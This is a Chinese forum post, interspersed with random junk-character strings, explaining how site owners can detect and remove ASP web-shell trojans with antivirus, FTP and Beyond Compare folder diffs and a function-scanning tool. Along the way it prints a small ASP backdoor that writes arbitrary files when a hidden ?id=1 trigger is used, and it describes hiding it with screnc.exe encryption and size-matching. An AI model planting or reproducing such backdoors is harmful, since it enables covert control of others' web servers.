TA的每日心情 | 开心 2014-7-28 21:47 |
---|
签到天数: 2 天 [LV.1]初来乍到
|
网上的一些防范asp木马的教程都基于提前防范的基础之上,例如:禁止FSO,利用NTFS限制用户目录等等。这些方法虽然有效,但是都是基于提前防范的,而且对于一般的买空间来做网站的朋友来说显然不可能。我在这里讲讲如何有效的发现web空间中的asp木马并清除。
7 D P C, B5 y
2 G: P3 [# C- r* ^; `3 W! H; y5 @5 r: Z通过帮朋友整理web空间摸索出了一些技巧,这些技巧还挺管用,不敢独享,拿出来共享。
9 O' Z* M" N* \) r7 E$ }* @
% K5 d; e. ?, L- @/ {, g一.技巧1:杀毒软件查杀 , Y9 C- W/ V @8 v, _5 V8 t! J! B5 R
( V5 V7 a: c6 o- ~: `一些朋友可能在成功得到上传权限之后,上传的asp木马是一些非常有名的asp木马,例如:cmdasp,海洋顶端木马,这些木马虽然功能强大,但是早已经被杀毒软件列入了黑名单,所以利用杀毒软件对web空间中的文件进行扫描,可以有效的发现并清除这些有名的asp木马。这是我利用瑞星杀毒软件在web目录中查杀到的一个asp木马,木马标注为:Script.ASP.Rootkit.10.a,在瑞星的网站上搜索一下,可以知道这就是海洋顶端木马。
# X$ G- o: p4 ` m
6 L+ w2 V$ t+ z$ |% k/ s利用这种方法,可以有效的对抗一些小菜上传的asp木马,效果明显。
" g" u2 u) k1 a5 [
0 O& R' }% O! d* z2 p8 ~0 x8 \二.技巧2:FTP客户端对比
+ g0 g% C$ T% Y7 C$ o M) M3 ` [$ y$ t0 j% J& ^% F
上面的方法虽然对菜鸟入侵者比较管用,但是遇到稍微有点意识的入侵者来说,几乎失去效果,因为他们完全可以对asp木马进行伪装,加密,使其躲藏杀毒软件,这样的手法比较多,我个人比较喜欢微软开发个的一个asp加密小工具:screnc.exe,screnc.exe是一款ASP加密程序,加密的程式比较安全,使代码完全改变,使用也非常简单。只需要在命令下输入:
?1 o9 t$ `4 L; y3 w% s
5 Z7 n. D6 c- K) Z W' G7 U. x. ~screnc.exe,得到帮助命令:Usage: screnc [/?] [/f] [/xl] [/l ScriptLanguage] [/e DefaultExtension] 〈source〉 〈destination〉,根据提示,只需要输入:screnc.exe 要加密的asp木马名 输出的asp木马名,就可以完成加密伪装。 ) X) m4 Z- x3 p w( ?6 s- r& Z
4 H! i& ?. w8 I
经过加密之后,记事本打开查看,可以看到标签:〈% ……%〉,〈script〉〈/script〉 + A. }" v* g m
4 b$ Z: N; z5 R& y
等标签内的代码成为一些“乱码”,而杀毒软件查杀asp木马是通过搜索关键字来查杀,着阿姨能够显然就躲过查杀。 2 t% ^3 J; T5 f9 p A
: h% x& v3 F( }0 j; `盛大官方网站被黑,挂的网页木马代码就是利用screnc.exe来加密的,过了好几天才被发现,可见加密伪装手法的高超。
% N9 F3 T Y. b, x' i
& c4 E. C" M; v$ X! N所以要采取另外的措施对付这种加密伪装的asp木马,我们可以利用一些FTP客户端软件(例如cuteftp,FlashFXP)提供的文件对比功能,通过对比FTP的中的web文件和本地的备份文件,发现是否错出可疑文件。
0 |2 d4 n5 N' n( {2 N
" {. N/ c& d4 l6 N. p# _这里以FlashFXP进行操作讲解。
3 J4 y# l- w5 I7 L4 D; @& ~4 F+ p& r
步骤1:打开FlashFXP,在左边窗口中跳转到本地web备份文件目录,在右边的FTP窗口中跳转到web目录下。
" |& a( y+ i# q% L" X6 t- B. V b
步骤2:点工具栏中的“工具”,选择其中的“比较文件夹命令”,即可进行对比文件夹,速度非常快。 & Y- S# X# G+ G
- V0 Z9 n9 e: j% f我们可以清楚的看到196个对象被过滤,在FTP空间中多出了这样几个asp文件:.asp,2005.asp等,这十有八九就是入侵者留下的asp后门,打开确认一下即可。
; x- {$ \" o9 o' L N0 V& T三.技巧3:用Beyond Compare 2进行对比 4 P" X% M8 B1 W# h' J
' n9 Q' Q1 w! ?
上面的利用FTP客户端对比文件的方法,虽然有效,但是遇到渗透入文件的asp木马,那就无能为力了,这里介绍一款渗透性asp木马,可以将代码插入到指定web文件中,平常情况下不会显示,只有使用触发语句才能打开asp木马,其隐蔽性非常高。代码如下: 4 Q* s, [& k9 \; g
8 n: j& k5 o. a
〈% 9 Z3 j5 d2 ^5 H, w/ s+ C$ |
. ~1 S& N) F4 N3 L; s+ Y# A
on error resume next ! |0 ]5 y6 {% k
1 N3 Q) H. r. D. F2 F, m7 d$ B- @
id=request("id")
; ^* f; e( }( b: J3 V- _, s; I6 V3 x9 p4 S
if request("id")=1 then
# ?5 F1 k7 Y9 p: Q1 G( u8 Q: s4 |& k
testfile=Request.form("name")
' [; S+ Z9 f4 ~, n4 h# f8 h
7 p1 i i0 L% C4 i, r2 X8 imsg=Request.form("message")
/ e7 ~: b$ r% D; B
0 [$ m9 L/ p2 t/ Pset fs=server.CreatObject("scripting.filesystemobject")
9 j* g1 g$ `! R3 ^( V$ U, s1 w, V, i) O* n
set thisfile=fs.openTestFile(testfile,8,True,0) 0 s, V N `8 a6 r4 h6 a3 O
7 k" Z5 N9 o3 i' \7 Z2 k
thisfile.Writeline(""&msg&"")
. s+ B5 d$ f4 ~1 m
2 S5 \3 y- a* p5 d3 s0 Gthisfile.close 4 P7 X5 n) S6 o2 _- y- H
& a* x; {2 K& Z( ~6 m1 jset fs=nothing
+ m% ?. A0 L' `, I5 w' O" D* Z* V: J3 a
%〉 % z, t9 I! E; O) c# N- |
" i; p* t" g! C/ f S
〈from method="post" Action="保存"?id=1〉
2 U9 D g; G% S; `7 ?/ i1 ~7 Q& ?- s
〈input type="text" size="20" name="Name"
+ N' E! F0 m7 K5 H$ ]
( m1 S# ~ D- U( h( _/ NValue=〈%=server.mappath("XP.ASP")%〉〉 ) a5 W" e& n, `) e
$ M i# h2 K3 G7 G: a, X8 V
〈textarea name="Message" class=input〉
1 }3 w( |* ]9 v8 F7 C
4 |8 U' T L; b1 |; Y: h* V& I% c$ z+ b1 i& ]
〈/textarea〉
- {. N9 X) g: r3 I$ Y# o$ c
0 D4 H( s5 O) r' O〈input type="Submit" name="send" Value="生成"
2 p* b- n# o$ Y0 ]2 B3 i
# z8 }' G s5 D; D0 z* i6 g* cclass=input〉 / @9 a4 g" B6 g, v+ G5 q
9 g' i' c( V& l6 x: O( J
〈/from〉
* e) F( E# ^6 s4 {" M4 a \
8 m) z, c- b7 }4 h6 X- i〈%end if%〉
3 [* b+ I4 o. \0 m+ ^5 k" g# u9 [: j0 l
注意:在修改目标主机的web文件时,要注意这样的文件修改后没有效果,即含有类似于:〈!--#include file="inc/conn.asp"--〉这样的文件包含命令,这样的代码存在时,加入asp代码后根本不会显示出脚本后门,但是脚本后门代码不会影响原文件的显示和功能。
+ k! I- V5 v' O# N: v$ ]2 b4 u% Z9 |- {4 p5 q
假如已经对目标服务器www.target.com下的一个editor_InsertPic.asp文件进行了修改,插入了脚本后门代码,那么打开的方式是:www. target..com/editor_InsertPic.asp?id=1,注意后门的字符?id=1,有了这些字符,才能保证脚本后门显示出来!普通情况下打开www. target..com/editor_InsertPic.asp?id=1,是不会露出破绽的。
8 k1 P( u; g& l, F \1 i6 {6 C& B, ?" A5 F
这招真是asp木马放置中非常狠的,如果遇到这样的情况,该怎么办?我们可以利用一款专业的文件对比工具Beyond Compare 2来完成木马的查找。 2 _# v- h1 U* h& S$ k) x
6 p4 Z, M2 U7 N, R4 p x
Beyond Compare 2一款不可多得的专业级的文件夹和文件对比工具。使用它可以很方便的对比出两个文件夹或者文件的不同之处。并把相差的每一个字节用颜色加以表示,查看方便。并且支持多种规则对比。+ w5 m# g. Q+ W1 q6 ?2 |1 a( C
- t% i# u6 d6 m2 B
看我来利用它完成渗透性asp木马的查找。
0 M6 L. z$ p% X% A8 K& J
' t( P( k2 c! Z9 Q步骤1:打开Beyond Compare 2,点工具栏中的“比较任务”,选择其中的选项:新建,在“比较模式”中选择“比较两个文件夹”。进入一下步,选择需要对比的两个文件夹路径,即备份过的网站文件以及从FTP上下载的网站文件,再在下面的“文件过滤器”中选择“包括所有文件”。在“比较范围”中选择“文件大小”。设置完毕即可开始比较。
1 W, g+ U7 T* U4 B
M4 M# [! M9 ]1 p/ i/ j- S步骤2:比较完毕,软件界面左右两边分别显示了比较的结果,从中可以很容易找到哪个目录多出了什么文件。 0 G& i: Q1 r" _4 ~
a ]# p4 ]: p3 J; O
步骤3:文件名相同,但是大小不同的文件,会被软件用另外的颜色标注出来,选择上它们,然后选择工具栏的“操作”中的“比较内容”功能,即可展开两个文件的详细内容,从中我们可以看到FTP端的文件被插入了渗透asp木马。这下很容易找到了吧!
: d6 T! n- t) a" G# n& p. F
; Y# T/ p/ t9 X& L1 E3 u6 ~2 E) w- M4 |
四.技巧4:利用组件性能找asp木马 2 b2 @/ u" A6 V8 F7 X+ Z
6 g0 e0 P4 X/ L# o x% C上面分门别类的介绍了几种asp木马的放置与查杀技巧,一般的菜鸟,老鸟恐怕都是利用上面的方法来放置asp木马吧!所以可以有效的对抗web空间中上传的asp木马。这下可以高枕无忧了吧?呵呵!先别急,还有一种BT的asp木马放置方法,你可能很难想到,放置思路是这样的:在目标web空间中寻找一个不常用的,比较合适的asp文件,打开它对其进行代码精简,然后再将渗透asp木马的代码插入,再对其进行精简,直至与原本的文件大小一样。最后利用加密伪装的手法对其进行处理。这样就彻底练就了一个绝对隐藏的asp木马后门,一般的入侵者恐怕很难做到这一点,因为要精简代码的同时还要保证asp木马的功能不会错误。 ( o" o' T( @% G4 W( f& {
* n( M6 _ I) l' K& I0 m8 E
如果你恰恰遇到一个这样的入侵者,那么该怎么才能查出被他放置的asp木马呢?你可能认为这已经不太可能了,呵呵!完全可能,看我拿出宝贝来:思易asp木马追捕。 ; m2 \8 l/ s5 j7 L- u: N
( @! a% k7 {$ T' P0 g/ b1 f它是一款专门检索各种asp文件所带功能的asp软件,通过搜索asp木马含有的特殊字符,以及搜索利用变量创建对象及静态对象建立的代码,来找出可能含有疑点的asp文件,从而有效的防范asp木马。 $ t5 e& ?! l/ W4 W) C
5 b3 C$ }$ X6 A/ }0 R使用非常简单,只需要将文件asplist2.0.asp上传到web空间下,然后在地址拦中打开,就完成了所有asp文件的检索。可以看出它是通过查找各个asp文件的功能来确认是否为asp木马,这些功能也都是asp木马常用的:FSO,WS,SHELL,XML等等。 . w# `. S* s" q
0 v* @ G2 N. w+ h
一般的web文件很少具有这样的功能,只有那些可恶的asp木马才具有,可以看到一些文件具备了相当多的功能,这时候,就可以打开这些文件来确认是否是asp木马,非常有效。 1 z# P6 q+ L$ N0 m2 b+ E
" M9 f& W/ j1 w4 w; m
大家在查找web空间的asp木马时,最好几种方法结合起来,这样就能有效的查杀被隐藏起来的asp木马。 |
|